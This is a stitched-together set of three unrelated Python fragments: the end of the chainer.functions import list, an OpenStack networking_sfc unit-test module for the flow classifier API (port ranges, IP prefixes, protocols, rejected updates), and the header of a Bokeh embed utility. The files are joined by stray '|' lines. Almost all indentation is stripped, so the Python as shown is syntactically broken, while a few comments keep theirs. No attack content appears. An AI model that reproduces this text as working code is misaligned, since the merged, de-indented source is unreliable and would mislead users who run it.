from chainer.functions.math.minmax import Max # NOQA
from chainer.functions.math.minmax import min # NOQA
from chainer.functions.math.minmax import Min # NOQA
from chainer.functions.math.prod import prod # NOQA
from chainer.functions.math.prod import Prod # NOQA
from chainer.functions.math.scale import scale # NOQA
from chainer.functions.math.sign import sign # NOQA
from chainer.functions.math.sqrt import rsqrt # NOQA
from chainer.functions.math.sqrt import sqrt # NOQA
from chainer.functions.math.sqrt import Sqrt # NOQA
from chainer.functions.math.square import square # NOQA
from chainer.functions.math.square import Square # NOQA
from chainer.functions.math.squared_difference import squared_difference # NOQA
from chainer.functions.math.squared_difference import SquaredDifference # NOQA
from chainer.functions.math.sum import sum # NOQA
from chainer.functions.math.sum import Sum # NOQA
from chainer.functions.math.tensordot import tensordot # NOQA
from chainer.functions.math.trigonometric import arccos # NOQA
from chainer.functions.math.trigonometric import Arccos # NOQA
from chainer.functions.math.trigonometric import arcsin # NOQA
from chainer.functions.math.trigonometric import Arcsin # NOQA
from chainer.functions.math.trigonometric import arctan # NOQA
from chainer.functions.math.trigonometric import Arctan # NOQA
from chainer.functions.math.trigonometric import arctan2 # NOQA
from chainer.functions.math.trigonometric import Arctan2 # NOQA
from chainer.functions.math.trigonometric import cos # NOQA
from chainer.functions.math.trigonometric import Cos # NOQA
from chainer.functions.math.trigonometric import sin # NOQA
from chainer.functions.math.trigonometric import Sin # NOQA
from chainer.functions.math.trigonometric import tan # NOQA
from chainer.functions.math.trigonometric import Tan # NOQA
from chainer.functions.noise.dropout import dropout # NOQA
from chainer.functions.noise.dropout import Dropout # NOQA
from chainer.functions.noise.gaussian import gaussian # NOQA
from chainer.functions.noise.gaussian import Gaussian # NOQA
from chainer.functions.noise.gumbel_softmax import gumbel_softmax # NOQA
from chainer.functions.noise.simplified_dropconnect import simplified_dropconnect # NOQA
from chainer.functions.noise.simplified_dropconnect import SimplifiedDropconnect # NOQA
from chainer.functions.noise.zoneout import zoneout # NOQA
from chainer.functions.noise.zoneout import Zoneout # NOQA
from chainer.functions.normalization.batch_normalization import batch_normalization # NOQA
from chainer.functions.normalization.batch_normalization import fixed_batch_normalization # NOQA
from chainer.functions.normalization.batch_renormalization import batch_renormalization # NOQA
from chainer.functions.normalization.batch_renormalization import fixed_batch_renormalization # NOQA
from chainer.functions.normalization.l2_normalization import normalize # NOQA
from chainer.functions.normalization.l2_normalization import NormalizeL2 # NOQA
from chainer.functions.normalization.layer_normalization import layer_normalization # NOQA
from chainer.functions.normalization.layer_normalization import LayerNormalization # NOQA
from chainer.functions.normalization.local_response_normalization import local_response_normalization # NOQA
from chainer.functions.normalization.local_response_normalization import LocalResponseNormalization # NOQA
from chainer.functions.pooling.average_pooling_2d import average_pooling_2d # NOQA
from chainer.functions.pooling.average_pooling_2d import AveragePooling2D # NOQA
from chainer.functions.pooling.average_pooling_nd import average_pooling_nd # NOQA
from chainer.functions.pooling.average_pooling_nd import AveragePoolingND # NOQA
from chainer.functions.pooling.max_pooling_2d import max_pooling_2d # NOQA
from chainer.functions.pooling.max_pooling_2d import MaxPooling2D # NOQA
from chainer.functions.pooling.max_pooling_nd import max_pooling_nd # NOQA
from chainer.functions.pooling.max_pooling_nd import MaxPoolingND # NOQA
from chainer.functions.pooling.roi_pooling_2d import roi_pooling_2d # NOQA
from chainer.functions.pooling.roi_pooling_2d import ROIPooling2D # NOQA
from chainer.functions.pooling.spatial_pyramid_pooling_2d import spatial_pyramid_pooling_2d # NOQA
from chainer.functions.pooling.unpooling_2d import Unpooling2D # NOQA
from chainer.functions.pooling.unpooling_2d import unpooling_2d # NOQA
from chainer.functions.pooling.unpooling_nd import unpooling_nd # NOQA
from chainer.functions.pooling.unpooling_nd import UnpoolingND # NOQA
from chainer.functions.pooling.upsampling_2d import Upsampling2D # NOQA
from chainer.functions.pooling.upsampling_2d import upsampling_2d # NOQA
from chainer.functions.theano.theano_function import TheanoFunction # NOQA
from chainer.functions.util.forget import forget # NOQA
from chainer.functions.util.forget import Forget # NOQA
# Aliases
mean = average
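# Illustrative use of this namespace (a minimal sketch; assumes numpy is
# available and chainer is installed):
#   import numpy as np
#   import chainer.functions as F
#   x = np.array([[1.0, -2.0, 3.0]], dtype=np.float32)
#   F.relu(x)      # Variable holding [[1., 0., 3.]]
#   F.mean(x)      # alias for F.average, defined just above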
|
|
# Copyright 2015 Futurewei. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from neutron.api.v2 import resource as api_res_log
from neutron import manager
from neutron.notifiers import nova as nova_log
from neutron.tests.unit.api.v2 import test_base as test_api_v2
from neutron.tests.unit.extensions import base as test_api_v2_extension
from neutron_lib import constants as const
from oslo_config import cfg
from oslo_utils import uuidutils
from webob import exc
import webtest
from networking_sfc.extensions import flowclassifier as fc_ext
_uuid = uuidutils.generate_uuid
_get_path = test_api_v2._get_path
FLOW_CLASSIFIER_PATH = (fc_ext.FLOW_CLASSIFIER_PREFIX[1:] + '/' +
fc_ext.FLOW_CLASSIFIER_EXT + 's')
class FlowClassifierExtensionTestCase(
test_api_v2_extension.ExtensionTestCase
):
fmt = 'json'
def setUp(self):
self._mock_unnecessary_logging()
super(FlowClassifierExtensionTestCase, self).setUp()
self.setup_extension(
'networking_sfc.extensions.flowclassifier.'
'FlowClassifierPluginBase',
fc_ext.FLOW_CLASSIFIER_EXT,
fc_ext.Flowclassifier,
fc_ext.FLOW_CLASSIFIER_PREFIX[1:],
plural_mappings={}
)
def _mock_unnecessary_logging(self):
mock_log_cfg_p = mock.patch.object(cfg, 'LOG')
self.mock_log_cfg = mock_log_cfg_p.start()
mock_log_manager_p = mock.patch.object(manager, 'LOG')
self.mock_log_manager = mock_log_manager_p.start()
mock_log_nova_p = mock.patch.object(nova_log, 'LOG')
self.mock_log_nova = mock_log_nova_p.start()
mock_log_api_res_log_p = mock.patch.object(api_res_log, 'LOG')
self.mock_log_api_res_log = mock_log_api_res_log_p.start()
def _get_expected_flow_classifier(self, data):
source_port_range_min = data['flow_classifier'].get(
'source_port_range_min')
if source_port_range_min is not None:
source_port_range_min = int(source_port_range_min)
source_port_range_max = data['flow_classifier'].get(
'source_port_range_max')
if source_port_range_max is not None:
source_port_range_max = int(source_port_range_max)
destination_port_range_min = data['flow_classifier'].get(
'destination_port_range_min')
if destination_port_range_min is not None:
destination_port_range_min = int(destination_port_range_min)
destination_port_range_max = data['flow_classifier'].get(
'destination_port_range_max')
if destination_port_range_max is not None:
destination_port_range_max = int(destination_port_range_max)
return {'flow_classifier': {
'name': data['flow_classifier'].get('name') or '',
'description': data['flow_classifier'].get('description') or '',
'tenant_id': data['flow_classifier']['tenant_id'],
'project_id': data['flow_classifier']['project_id'],
'source_port_range_min': source_port_range_min,
'source_port_range_max': source_port_range_max,
'destination_port_range_min': destination_port_range_min,
'destination_port_range_max': destination_port_range_max,
'l7_parameters': data['flow_classifier'].get(
'l7_parameters') or {},
'destination_ip_prefix': data['flow_classifier'].get(
'destination_ip_prefix'),
'source_ip_prefix': data['flow_classifier'].get(
'source_ip_prefix'),
'logical_source_port': data['flow_classifier'].get(
'logical_source_port'),
'logical_destination_port': data['flow_classifier'].get(
'logical_destination_port'),
'ethertype': data['flow_classifier'].get(
'ethertype') or 'IPv4',
'protocol': data['flow_classifier'].get(
'protocol')
}}
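    # Illustrative normalisation performed above (values made up): a request
    # carrying {'source_port_range_min': '100'} comes back in the expected
    # dict as the integer 100, while omitted fields default to '', {},
    # 'IPv4', or None as coded in the return statement.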
def test_create_flow_classifier(self):
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_source_port_range(self):
for source_port_range_min in [None, 100, '100']:
for source_port_range_max in [None, 200, '200']:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'source_port_range_min': source_port_range_min,
'source_port_range_max': source_port_range_max,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_destination_port_range(self):
for destination_port_range_min in [None, 100, '100']:
for destination_port_range_max in [None, 200, '200']:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'destination_port_range_min': destination_port_range_min,
'destination_port_range_max': destination_port_range_max,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_source_ip_prefix(self):
for logical_source_ip_prefix in [
None, '10.0.0.0/8'
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': logical_source_ip_prefix,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_destination_ip_prefix(self):
for logical_destination_ip_prefix in [
None, '10.0.0.0/8'
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'destination_ip_prefix': logical_destination_ip_prefix,
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
            self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_logical_source_port(self):
for logical_source_port in [
None, _uuid()
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': logical_source_port,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_logical_destination_port(self):
for logical_destination_port in [
None, _uuid()
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_destination_port': logical_destination_port,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_l7_parameters(self):
for l7_parameters in [None, {}]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'l7_parameters': l7_parameters
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_ethertype(self):
for ethertype in [None, 'IPv4', 'IPv6']:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'ethertype': ethertype
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_protocol(self):
for protocol in [
None, const.PROTO_NAME_TCP, const.PROTO_NAME_UDP,
const.PROTO_NAME_ICMP
]:
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'protocol': protocol
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_create_flow_classifier_all_fields(self):
flowclassifier_id = _uuid()
tenant_id = _uuid()
data = {'flow_classifier': {
'name': 'test1',
'description': 'desc',
'tenant_id': tenant_id, 'project_id': tenant_id,
'source_port_range_min': 100,
'source_port_range_max': 200,
'destination_port_range_min': 100,
'destination_port_range_max': 200,
'l7_parameters': {},
'destination_ip_prefix': '10.0.0.0/8',
'source_ip_prefix': '10.0.0.0/8',
'logical_source_port': _uuid(),
'logical_destination_port': _uuid(),
'ethertype': None,
'protocol': None
}}
expected_data = self._get_expected_flow_classifier(data)
return_value = copy.copy(expected_data['flow_classifier'])
return_value.update({'id': flowclassifier_id})
instance = self.plugin.return_value
instance.create_flow_classifier.return_value = return_value
res = self.api.post(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
instance.create_flow_classifier.assert_called_with(
mock.ANY,
flow_classifier=expected_data)
self.assertEqual(exc.HTTPCreated.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
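    # The remaining create tests exercise input validation: malformed bodies
    # are rejected by the API layer, which webtest surfaces as AppError.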
def test_create_flow_classifier_invalid_l7_parameters(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'l7_parameters': {'abc': 'def'},
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_invalid_protocol(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'protocol': 'unknown',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_invalid_ethertype(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'ethertype': 'unknown',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_port_small(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'source_port_range_min': -1,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_port_large(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'source_port_range_min': 65536,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_ip_prefix_no_cidr(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': '10.0.0.0',
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_ip_prefix_invalid_cidr(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': '10.0.0.0/33',
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_create_flow_classifier_port_id_nouuid(self):
tenant_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': 'unknown',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.post,
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_list(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = [{
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}]
instance = self.plugin.return_value
instance.get_flow_classifiers.return_value = return_value
res = self.api.get(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt))
instance.get_flow_classifiers.assert_called_with(
mock.ANY,
fields=mock.ANY,
filters=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifiers', res)
self.assertEqual(return_value, res['flow_classifiers'])
def test_flow_classifier_list_all_fields(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = [{
'name': 'abc',
'description': 'abc',
'ethertype': 'IPv4',
'protocol': const.PROTO_NAME_TCP,
'source_ip_prefix': '10.0.0.0/8',
'destination_ip_prefix': '10.0.0.0/8',
'source_port_range_min': 100,
'source_port_range_max': 200,
'destination_port_range_min': 100,
'destination_port_range_max': 200,
'logical_source_port': _uuid(),
'logical_destination_port': _uuid(),
'l7_parameters': {},
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}]
instance = self.plugin.return_value
instance.get_flow_classifiers.return_value = return_value
res = self.api.get(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt))
instance.get_flow_classifiers.assert_called_with(
mock.ANY,
fields=mock.ANY,
filters=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifiers', res)
self.assertEqual(return_value, res['flow_classifiers'])
def test_flow_classifier_list_unknown_fields(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = [{
'logical_source_port': _uuid(),
'new_key': 'value',
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}]
expected_return = copy.copy(return_value)
for item in expected_return:
del item['new_key']
instance = self.plugin.return_value
instance.get_flow_classifiers.return_value = return_value
res = self.api.get(
_get_path(FLOW_CLASSIFIER_PATH, fmt=self.fmt))
instance.get_flow_classifiers.assert_called_with(
mock.ANY,
fields=mock.ANY,
filters=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifiers', res)
self.assertEqual(expected_return, res['flow_classifiers'])
def test_flow_classifier_get(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
return_value = {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}
instance = self.plugin.return_value
instance.get_flow_classifier.return_value = return_value
res = self.api.get(
_get_path(
FLOW_CLASSIFIER_PATH,
id=flowclassifier_id, fmt=self.fmt
)
)
instance.get_flow_classifier.assert_called_with(
mock.ANY,
flowclassifier_id,
fields=mock.ANY
)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
def test_flow_classifier_update(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
update_data = {'flow_classifier': {
'name': 'new_name',
'description': 'new_desc',
}}
return_value = {
'tenant_id': tenant_id, 'project_id': tenant_id,
'id': flowclassifier_id
}
instance = self.plugin.return_value
instance.update_flow_classifier.return_value = return_value
res = self.api.put(
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(update_data))
instance.update_flow_classifier.assert_called_with(
mock.ANY, flowclassifier_id,
flow_classifier=update_data)
self.assertEqual(exc.HTTPOk.code, res.status_int)
res = self.deserialize(res)
self.assertIn('flow_classifier', res)
self.assertEqual(return_value, res['flow_classifier'])
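    # Most flow classifier attributes are create-only; the update tests below
    # verify that a PUT carrying any of them is rejected.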
def test_flow_classifier_update_source_port_range_min(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'source_port_range_min': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_source_port_range_max(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'source_port_range_max': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_destination_port_range_min(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'destination_port_range_min': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_destination_port_range_max(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'destination_port_range_max': 100,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_source_ip_prefix(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'source_ip_prefix': '10.0.0.0/8',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_destination_ip_prefix(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'destination_ip_prefix': '10.0.0.0/8',
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_logical_source_port(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'logical_source_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_logical_destination_port(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'logical_destination_port': _uuid(),
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_ethertype(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'ethertype': None,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_protocol(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
            'protocol': None,
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_update_l7_parameters(self):
tenant_id = _uuid()
flowclassifier_id = _uuid()
data = {'flow_classifier': {
'l7_parameters': {},
'tenant_id': tenant_id, 'project_id': tenant_id,
}}
self.assertRaises(
webtest.app.AppError,
self.api.put,
_get_path(FLOW_CLASSIFIER_PATH, id=flowclassifier_id,
fmt=self.fmt),
self.serialize(data),
content_type='application/%s' % self.fmt)
def test_flow_classifier_delete(self):
self._test_entity_delete('flow_classifier')
|
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Internal utilities used by the ``bokeh.embed`` functions to serialize
Bokeh models and documents for standalone output.
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging # isort:skip
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager
# Bokeh imports
from ..document.document import Document
from ..model import Model, collect_models
